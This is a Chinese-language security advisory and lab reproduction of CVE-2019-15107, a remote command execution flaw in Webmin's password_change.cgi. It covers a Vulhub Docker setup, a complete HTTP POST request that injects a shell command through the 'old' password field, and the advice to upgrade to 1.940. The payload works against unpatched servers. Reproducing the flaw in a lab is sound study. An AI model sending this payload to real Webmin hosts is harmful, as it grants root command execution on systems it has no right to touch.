CVE-2019-15107 Webmin 远程命令执行漏洞

 

0x01漏洞简述

Webmin 中的password_change.cgi可在外部输入数据构造特殊代码,任何被授权使用Package Updates模块的用户都可以使用根权限通过包含的向量执行任意命令。

0x02知识扩展

Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。

 

0x03风险等级

漏洞的评定结果如下:

评定方式  等级

威胁等级  严重

影响面      广泛

 

0x04影响版本

Webmin <= 1.920

 

0x05漏洞环境搭建

所需系统环境及配置信息

靶机

操作系统:CentOS 7

IP:192.168.246.133

攻击机

操作系统:Wimdows 10

IP:192.168.246.1

 

所需工具

Docker Vulhub

 

安装步骤

1、安装Vulhub

`yum -y install python3 git && curl -s https://get.docker.com/ | sh  && curl -s https://bootstrap.pypa.io/get-pip.py | python3 && pip install docker-compose && git clone https://github.com/vulhub/vulhub.git && curl -sSL https://get.daocloud.io/daotools/set_mirror.sh | sh -s http://f1361db2.m.daocloud.io && systemctl start docker`

2、启动环境

cd vulhub/webmin/CVE-2019-15107/ && docker-compose up -d

3、docker ps -a查看当前启动的容器ID,

docker exec -it 0f474318311e /bin/bash

通过ID进入容器修改ROOT账户密码

4、返回网页使用ROOT账户密码登录Webmin,登录后根据下图指示,启用设置修改密码功能

 

0x06漏洞环境验证

1、访问:

 `https://<your-ip>/password_change.cgi `

并用burp抓取数据包。

2、将内容改为如下payload,执行的命令为 id。

POST /password_change.cgi HTTP/1.1
Host: 192.168.246.133:10000Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://192.168.246.133:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

3、发送payload,发现命令执行成功。

 

0x07修复建议

目前Webmin官方已发布最新版本Webmin 1.940 修复了该漏洞,请受影响的用户尽快升级至最新版本,下载链接:

  • http://webmin.com/download.html

 

 

 

海狼科技官方微博:

如果您遇到网络安全问题

欢迎致电:0991-8156363

或发送至:sudo@xjsec.cn

新疆海狼科技,您身边的网络安全助理

更多资讯请扫描底部二维码